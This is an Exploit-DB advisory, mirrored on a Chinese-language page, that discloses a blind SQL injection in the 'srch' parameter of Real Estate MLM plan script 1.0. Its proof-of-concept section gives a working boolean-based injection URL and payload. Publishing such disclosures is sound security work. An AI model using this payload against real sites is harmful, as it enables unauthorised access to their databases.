Real Estate MLM plan script 1.0 – ‘srch’ SQL Injection

  • 作者: 8bitsec
    日期: 2017-09-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42926/
  • # Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection
    # Date: 2017-09-28
    # Exploit Author: 8bitsec
    # Vendor Homepage: http://www.mlmscript.in/
    # Software Link: http://www.mlmscript.in/real-estate-mlm-script.html
    # Version: 1.0
    # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
    # Email: contact@8bitsec.io
    # Contact: https://twitter.com/_8bitsec
    
    Release Date:
    =============
    2017-09-28
    
    Product & Service Introduction:
    ===============================
    Real Estate MLM plan script we have used influential and having advanced secure database system here, that will help protect your user's sensitive details from outside attackers here we use newest technology to develop this Real Estate script.
    
    Technical Details & Description:
    ================================
    
    SQL injection on [srch] parameter.
    
    Proof of Concept (PoC):
    =======================
    
    SQLi:
    
    http://localhost/[path]/product-list.php?srch=search AND 3233=3233 AND 'NeVc'='NeVc
    
    Parameter: srch (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: srch=search' AND 3233=3233 AND 'NeVc'='NeVc
    
    ==================
    8bitsec - [https://twitter.com/_8bitsec]